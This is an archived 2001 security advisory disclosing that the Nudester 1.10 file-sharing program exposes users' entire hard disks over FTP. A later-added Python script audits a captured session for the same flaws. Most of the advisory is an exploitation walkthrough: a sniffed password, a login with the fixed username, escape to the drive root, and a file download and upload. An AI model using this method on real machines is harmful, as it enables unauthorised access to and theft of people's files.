[Real Security] Advisory for Nudester 1.10

From: Gary (Cyph3rat_private)
Date: Thu Aug 16 2001 - 23:34:40 PDT

    <------------------------->
    [Real Security Advisory #1]
    [     Author: Cyph3r           ]
    [  www.Real-Security.org  ]
    [    Date: 08/16/2001         ]
    <------------------------->
    [Vulnerable:                       ]
    [Nudester 1.10(& below?)]
    [  OS: Win9x/me/2k/nt/xp  ]
    [ Site: www.nudester.org   ]
    <------------------------->
    
    -> Severity: Malicious users can gain full access to the user's files
    (upload/download).
    
    -> Overview: Nudester, a file-sharing program for porn, uses the FTP protocol
    to transfer files. The problem is that it gives access to the whole hard disk
    instead of just the folder containing the porn.
    Example:
    Open Nudester together with a sniffer program (e.g. Iris, www.eeye.com) and
    download a file from a user on Nudester while the sniffer is running with a
    filter on port 21, so that you capture the password.
    
    <Sniffed Data>
    
    220 ICS FTP Server ready
    user NUDESTER
    331 Password required for NUDESTER
    pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
    230 User NUDESTER logged in
    
    </Sniffed Data>
    
    Open an FTP client and connect to the IP address:
    
    ftp> open ***.***.***.***
    Connected to ***.***.***.***
    220 ICS FTP Server ready.
    User (***.***.***.***:(none)): NUDESTER
    331 Password required for NUDESTER.
    Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
    230 User NUDESTER logged in.
    
    - Bingo!
    
    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    C:\TEMP\*.* not found
    226 File sent ok
    ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
    ftp> cd ..
    250 CWD command successful. "C:/" is current directory.
    ftp> DIR
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw-   1 ftp      ftp         1152 Oct 30  2000 FRUNLOG.TXT
    -rwxrwxrwx   1 ftp      ftp        25473 May 15  1998 MSCDEX.EXE
    -rw-rw-rw-   1 ftp      ftp        10604 May 15  1997 CDROM.SYS
    -rwxrwxrwx   1 ftp      ftp        20135 May 15  1998 KEYB.COM
    -rw-rw-rw-   1 ftp      ftp        34566 May 15  1998 KEYBOARD.SYS
    -rwxrwxrwx   1 ftp      ftp        71102 May 15  1998 EDIT.COM
    -rw-rw-rw-   1 ftp      ftp           38 Oct 16  1998 AUTOEXEC.OLD
    -rw-rw-rw-   1 ftp      ftp           31 Oct 16  1998 CONFIG.OLD
    drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 ATI
    -rw-rw-rw-   1 ftp      ftp          121 Oct 29  2000 CONFIG.DOS
    -rw-rw-rw-   1 ftp      ftp          113 Oct 29  2000 AUTOEXEC.DOS
    -rw-rw-rw-   1 ftp      ftp          436 Nov 18  2000 AUTOEXEC.BAK
    drw-rw-rw-   1 ftp      ftp            0 Oct 29  2000 WINDOWS
    drw-rw-rw-   1 ftp      ftp            0 Oct 30  2000 WINDOWS.000
    -rw-rw-rw-   1 ftp      ftp         7471 Nov 18  2000 NETLOG.TXT
    -rw-rw-rw-   1 ftp      ftp          172 Nov 15  2000 CONFIG.BAK
    -rw-rw-rw-   1 ftp      ftp         5048 Nov 17  2000 SETUPXLG.TXT
    -rwxrwxrwx   1 ftp      ftp          438 Aug 16 00:43 AUTOEXEC.BAT
    dr--r--r--   1 ftp      ftp            0 Oct 29  2000 Program Files
    -rw-rw-rw-   1 ftp      ftp          172 Nov 18  2000 CONFIG.SYS
    -rw-rw-rw-   1 ftp      ftp        19622 Aug 10 18:50 SCANDISK.LOG
    -rw-rw-rw-   1 ftp      ftp          327 Oct 30  2030 outreg.txt
    -rw-rw-rw-   1 ftp      ftp          339 Oct 30  2030 outreg.ini
    drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 dcpt
    -rwxrwxrwx   1 ftp      ftp        17129 Oct 30  2030 BOOTDISK.EXE
    -rwxrwxrwx   1 ftp      ftp      2884286 Oct 30  2030 DECOMP.EXE
    -rwxrwxrwx   1 ftp      ftp       265420 Oct 30  2030 DOS4GW.EXE
    -rw-rw-rw-   1 ftp      ftp          507 Oct 30  2030 FILE_ID.DIZ
    -rw-rw-rw-   1 ftp      ftp         2086 Oct 30  2030 HELPME.DOC
    -rw-rw-rw-   1 ftp      ftp         3639 Oct 30  2030 LICENSE.DOC
    -rw-rw-rw-   1 ftp      ftp         1377 Oct 30  2030 ORDER.DOC
    drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 KPCMS
    -rw-rw-rw-   1 ftp      ftp          386 Nov 02  2000 AUTOEXEC.001
    drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 psfonts
    -rw-rw-rw-   1 ftp      ftp           25 Nov 03  2000 prompt
    -rwxrwxrwx   1 ftp      ftp        95874 May 05  1999 COMMAND.COM
    drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Winzip
    drw-rw-rw-   1 ftp      ftp            0 Dec 10  2000 unzipped
    drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Antivirus
    drw-rw-rw-   1 ftp      ftp            0 Dec 16  2000 My Music
    -rw-rw-rw-   1 ftp      ftp          118 Jan 20 00:27 netsig.txt
    drw-rw-rw-   1 ftp      ftp            0 Mar 15 21:05 accelerator
    -rw-rw-rw-   1 ftp      ftp        22721 Aug 17 01:00 winzip.log
    226 File sent ok
    ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
    
    - Let's see if we have access to download a file
    
    ftp> get netsig.txt
    200 Port command successful.
    150 Opening data connection for netsig.txt.
    226 File sent ok
    ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
    
    - Yep, let's try to upload a file
    
    ftp> put c:\temp.txt
    200 Port command successful.
    150 Opening data connection for TEMP.TXT.
    226 File received ok
    
    -> Conclusion: anyone can gain full access to a Nudester user's files. The
    username is the same for every user; the password, however, is not, so you
    have to sniff while downloading a file to retrieve it.
    The only solution to this problem is not to use Nudester.
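    As an added example (not part of the original advisory), the following Python audit replays a captured FTP control-channel session like the one sniffed above and flags the three weaknesses the advisory demonstrates: the password crossing the wire in cleartext, the fixed NUDESTER username, and the client escaping the share folder to the drive root. It assumes C:\TEMP was the intended share folder (the session above starts there before "cd .." lands in C:/), and the capture and password are constructed placeholders.

```python
import re

# Assumed share folder (the advisory's session starts in C:\TEMP before "cd .." lands in C:/).
SHARE_ROOT = "C:/TEMP"

# Constructed control-channel capture (C: client, S: server) modelled on the advisory; placeholder password.
CAPTURE = """\
S: 220 ICS FTP Server ready
C: user NUDESTER
S: 331 Password required for NUDESTER
C: pass PLACEHOLDER-PASSWORD
S: 230 User NUDESTER logged in
C: CWD ..
S: 250 CWD command successful. "C:/" is current directory.
C: RETR netsig.txt
C: STOR TEMP.TXT
"""

CWD_OK = re.compile(r'^250 CWD command successful\. "([^"]+)" is current directory\.$')

def inside_share(path, root):
    # Case-insensitive, slash-agnostic "path is root or below root" test.
    p = path.replace("\\", "/").rstrip("/").upper()
    r = root.replace("\\", "/").rstrip("/").upper()
    return p == r or p.startswith(r + "/")

def audit_ftp_session(capture, share_root=SHARE_ROOT):
    """Replay one FTP control session; return (finding, detail) tuples in order."""
    findings, user, cwd = [], None, None
    for line in capture.splitlines():
        side, _, msg = line.partition(": ")
        verb, _, arg = msg.partition(" ")
        verb = verb.upper()
        if side == "C" and verb == "USER":
            user = arg
        elif side == "C" and verb == "PASS":  # password is readable on the wire
            findings.append(("cleartext_password", f"user={user} password_len={len(arg)}"))
        elif side == "C" and verb in ("RETR", "STOR") and cwd and not inside_share(cwd, share_root):
            findings.append(("transfer_outside_share", f"{verb} {arg} in {cwd}"))
        elif side == "S" and msg.startswith("230 ") and user == "NUDESTER":
            # One account name for every install, so only the password guards it.
            findings.append(("shared_username_login", user))
        elif side == "S":
            m = CWD_OK.match(msg)
            if m:
                cwd = m.group(1)
                if not inside_share(cwd, share_root):
                    findings.append(("share_root_escape", cwd))
    return findings
```

    Run against CAPTURE it reports five findings; the same logic can be pointed at a real control-channel capture once the lines are tagged with their direction.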
    
    -> Credits: Cyph3r - Cyph3rat_private
    
    -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
    spasms, trew, zeronine, matt, shizniz, z0mb1e
    b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.
    



    This archive was generated by hypermail 2b30 : Fri Aug 17 2001 - 07:42:22 PDT